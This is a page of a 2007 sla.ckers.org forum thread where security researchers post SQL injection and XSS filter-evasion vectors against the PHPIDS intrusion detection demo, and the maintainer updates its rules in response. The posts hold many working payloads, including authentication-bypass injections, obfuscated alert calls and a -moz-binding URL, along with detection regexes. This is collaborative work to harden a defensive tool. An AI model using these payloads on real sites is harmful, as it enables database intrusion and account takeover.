Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...7891011121314151617...LastNext
Current Page: 12 of 31
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 25, 2007 10:30AM

its really getting harder ...
these work, although you have to know a column name first
(php-ids) aa'or column*0 like'0 (or rlike, regexp ...)
(php-ids) aa'or column*0='0
this also works with some reserved words the rules might not detect yet
(php-ids) aa'or current_date*0 != '1
but yeah, I dont like those kind of vectors that much ;)

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: October 28, 2007 10:09AM

Hi Reiners!

I just fixed them issues ;) Thx!

I sent you the Interview questions via PM...

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: kirke
Date: October 28, 2007 10:12AM

@.mario
from your initial post we see
(\\[\w]{3}) //detects the IE hex entities
checked most comments here and the default_filter.xml too, but it seems that this has not been improved, did you?
I'd use following instead (though not sure if 7 is really a limit):
(\\[a-zA-Z0-9]{1,7})  //  used character class 'cause I'd never use \w in a security context ;-) 

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Date: October 28, 2007 11:01AM

style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);"

trips the -mod-binding sig. but when I do this it does not..

style="-m\oz-bin\ding:url(http://h4k.in/mozxss.xml#xss);"

I thought the above is valid, reason you can bypass filters by say using ba\ckg\round-ima\ge:

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: October 28, 2007 11:35AM

@kirke: Hi!
(\\[\w]{3}) //detects the IE hex entities
That rule doesn't exist anymore. Why wouldn't you use \ł in a security context?

@CrYpTiC_MauleR: Hmmm - that one's hard to come by effectively. I'll think about that, thx!

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: October 28, 2007 12:13PM

Hi .mario!
interesting questions :) I'll answer them within the next couple of days.
until then, some modifications:

http://demo.php-ids.org/?test=aa'*%20current_date%20!=%20'1 aa'* current_date != '1
http://demo.php-ids.org/?test=1'*current_date*-0%20=%20'0 1'*current_date*-0 = '0
http://demo.php-ids.org/?test=1'*current_date%20rlike'0 1'*current_date rlike'0

http://demo.php-ids.org/?test=aa'/current_date%20in%20(0)%20--%20-a aa'/current_date in (0) -- -a
http://demo.php-ids.org/?test=aa'%20/%20current_date%20regexp%20'0 aa' / current_date regexp '0
http://demo.php-ids.org/?test=0'%20/%20current_date%20XOR%20'1 0' / current_date XOR '1
http://demo.php-ids.org/?test=aa'%20/%20current_date%20!=%20'1 aa' / current_date != '1

http://demo.php-ids.org/?test=1'%20or%20current_date*-0%20rlike'1 1' or current_date*-0 rlike'1

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: kirke
Date: October 28, 2007 01:41PM

Quote

Why wouldn't you use ..
I was talking about \hhhhh in IE, there the hex value can be anything between \0 and \fffffff, at least in javascript IIRC ...

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: October 29, 2007 03:44AM

@Reiners:
All fixed - current_whatever just happens to be a keyword too often so now the converter transforms current_\w+ for better detection.

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: October 29, 2007 11:22AM

yep. also check for system variables by looking for @@\w+ or something alike.

http://demo.php-ids.org/?test=1'*@@version*-0%20=%20'0 1'*@@version*-0%20=%20'0

user variables or other statics work also:

http://demo.php-ids.org/?test=1'*UTC_TIME%20or%20'1 1'*UTC_TIME or '1

http://demo.php-ids.org/?test=1'*@a%20or%20'1 1'*@a or '1
http://demo.php-ids.org/?test=1'*null%20or%20'1 1'*null or '1
http://demo.php-ids.org/?test=1'*@a%20is%20null%20-%20%27 1'*@a is null - '
http://demo.php-ids.org/?test=1'*null%20is%20null%20-%20%27 1'*null is null - '

@a is an unset user variable, so "1 * @var" returns "null".
the ending - ' just ensures that quotes are closed, because I cant find an undetected comment type atm ;)

greetings,
Reiners

edit:
just noticed that you can use \N as synonym for "null" ... that may trick some rules too. I'll try later ;)



Edited 3 time(s). Last edit at 10/29/2007 11:30AM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: October 29, 2007 12:14PM

fixed!

Wow - the \N issue is ugly. I what combinations can you use this? IS \N and NOT \N too?

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: October 29, 2007 02:50PM

"1/0 is \N" and "1 is not \N" both work.

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: tx
Date: October 29, 2007 02:51PM

Hey .mario,

Auth Bypass MATCH...AGAINST Variations http://demo.php-ids.org/?test=%27%20or%20MATCH%20username%20AGAINST%20%28%27%2badmin%20-a%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a :
?test=' or MATCH username AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a
?test=' or MATCH username,password AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('admin' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('admin -)' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('a* -) -+ ' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('+a* -anything can go here %#$&*$%^*#%$^&#$' IN BOOLEAN MODE); -- -a

EDIT:
Negative matching:
 ?test=' or NOT MATCH username AGAINST ('+h -a*' IN BOOLEAN MODE); -- -a
Stopwords:
?test=' or MATCH username AGAINST ('following contains follow inasmuch as admin contains a and then some etc etc etc. thanx' IN BOOLEAN MODE); -- -a

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 10/29/2007 03:50PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: October 29, 2007 03:44PM

I tested a few old ones, I couldn't wait ;) But seems like the rules are very good now, they resisted some very tricky ones.

Again a vector I personally dont like, but as stated it is no problem to find out a column name on MySQL (if error reporting is on).
http://demo.php-ids.org/?test=1'/column%20is%20not%20null%20-%20%27 1'/column is not null - '
http://demo.php-ids.org/?test=1'*column%20is%20not%20%5CN%20-%20%27 1'*column is not \N - '
http://demo.php-ids.org/?test=1'%5ecolumn%20is%20not%20null%20-%20%27 1'^column is not null - '

Then again one I like:
http://demo.php-ids.org/?test='is%5CN%20-%20'1 'is\N - '1
http://demo.php-ids.org/?test=aa'%20is%20%5CN%20or%20'1 aa' is \N or '1
(both return true, although I'm not quite sure why the first one does ;)

greetings,
Reiners

PS: I'm not forgetting about the interview ;)

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: October 30, 2007 11:24AM

@Reiners and tx: fixed!

@CrYpTiC_MauleR: In what browser did you get that one running?

style="-m\oz-bin\ding:url(http://h4k.in/mozxss.xml#xss);"

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: October 30, 2007 01:14PM

http://demo.php-ids.org/?test=aa'%20is%20%5CN%20or%201%20--%20-a aa' is \N or 1 -- -a

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: October 30, 2007 09:31PM

Muwhahahahahaha

Hackvertor makes my life easier ;)

foo = { get test() { return alert(1) } },
foo.test

gets through :D

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: November 03, 2007 05:16PM

a&#8205lert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: November 03, 2007 05:18PM

a‌lert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: November 03, 2007 06:00PM

I found those 2 after about 8 pints of beer too :P

hehe beer + hacking == fun

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: November 07, 2007 10:33AM

http://demo.php-ids.org/?test=aa%27is%5CN%7c!%27 aa'is\N|!'
http://demo.php-ids.org/?test=%27is%5CN-!%27 'is\N-!' (makes no sense to me, but works ;)

unaesthetic:
http://demo.php-ids.org/?test=asd%27%7ccolumn%26%26%271 asd'|column&&'1
http://demo.php-ids.org/?test=asd%27%7ccolumn!=%27 asd'|column!='

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: November 07, 2007 11:41AM

Hi!

Wow - those are indeed a lil' bit esoteric. Nice ones - thx!

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: November 07, 2007 03:13PM

this guy brought up a new vector I didnt knew of:
select ... from data where not ...
works also with "or" and "and", but not with "is", as far as I've tested.

http://demo.php-ids.org/?test=%27or%20not%27 'or not'
http://demo.php-ids.org/?test='or%20not%20false%20%23aa 'or not false #aa
sweet :)



Edited 1 time(s). Last edit at 11/07/2007 03:20PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: November 07, 2007 04:04PM

Nice - SQL really seems to be as flexible as JS. Anyway any vector slipping through via new keywords is easy to fix, thanks!

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: November 09, 2007 10:20AM

ha ya!

http://www.thespanner.co.uk/2007/11/09/webfu-using-the-hackvertor-hanzo-sword/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: November 19, 2007 11:10AM

Hi, no new vectors, but an old one passes by adding spaces:
http://demo.php-ids.org/?test=%27%20is%20%5CN%20-%20!%20%27 ' is \N - ! '
http://demo.php-ids.org/?test=%27%20is%20%5CN%20=%20%27 ' is \N = '

Today I was also checking how an SQLi attacker can fly below the PHP-IDS-radar. I think that the most users will only log high impacts, however, if you know that PHP-IDS is running, you can almost always modify your injection to get an impact of 5 or 6. Well, a user could modify the impact for every SQLi rule hisself, but I think most of them will leave it as default.
I guess it's beyond the scope of PHP-IDS and I couldn't think of a good solution for this either, since I dont think raising the default impact does the job. Just some thoughts.

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: November 19, 2007 04:27PM

Ew - gotta fix them tomorrow fixed :)

Hmmm - normally the impact should be incremented via session - so repeated attacks will result in very high impact.

But I guess not everybody implemented that functionality.

Thanks and Greetings,
.mario



Edited 1 time(s). Last edit at 11/20/2007 03:12AM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: November 20, 2007 10:11AM

&#x65val("aler&quot + "t(1)")

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: November 20, 2007 10:53AM

Fixed in PHPIDS 0.4.3 - very nice find - damn unclosed named entities!

btw - it's a kind of a quickfix - so there might be more with this way. For now :)

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Reiners
Date: November 20, 2007 02:12PM

http://demo.php-ids.org/?test='%20is%20%5CN=%27 :)

right, I totally forgot about the session which is a good solution I think.

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: November 21, 2007 04:25AM

Ah - little bug in one of the SQLI rules - a + where a * should have been used. Thanks for pointing out!

Options: ReplyQuote
Pages: PreviousFirst...7891011121314151617...LastNext
Current Page: 12 of 31


Sorry, only registered users may post in this forum.